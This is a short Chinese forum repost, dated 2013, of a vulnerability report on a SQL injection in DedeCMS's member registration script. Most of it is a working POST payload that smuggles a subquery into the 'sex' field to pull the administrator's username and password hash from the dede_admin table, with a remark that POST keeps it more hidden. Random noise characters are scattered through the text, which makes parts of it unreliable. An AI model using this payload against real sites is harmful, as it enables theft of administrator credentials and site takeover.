漏洞类型: SQL注射漏洞
. y7 v9 J% K; f! _ B. l! E简要描述:8 g) E) `& H' A( S6 R, H0 F" [
1 z* x4 N, ^/ H! ~ e7 ]0 O
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
. ]& H; k. o! f8 p原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.9 m% }) \: c b% z4 F8 o" v
详细说明:跟这个漏洞7 F& ?: `/ t+ h0 r( B; ?
( ?9 r; k& W2 z" U( t/ Q
WooYun: Dedecms SQL注射导致审核机制绕过漏洞3 x+ S# ]5 F5 y$ R9 b
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
+ C6 }9 c& V: C( _( x0 ^0 IPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
! W8 }% l C- i1 ^4 S2 Y0 G ) K6 ?0 c% A6 P2 X' z; n
www.political-security.com/member/reg_new.php- Y. \, @2 C& z9 q0 T! w& ?, y
/ A8 Q7 }4 K- }4 c8 }
POST) b) z, N; c" x4 N G7 |6 K
2 f9 C K' d' s/ ?2 d k
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
+ c- A3 |: @+ Quserid=c4rp3nt3r&uname=c4rp3nt3r2 G* h5 I! \4 T9 D# n
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss1 W. T2 x, ?: M/ M
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,1 z: Z& |9 b! v/ d' ?9 j
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
, r9 {: l5 N0 C; U%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对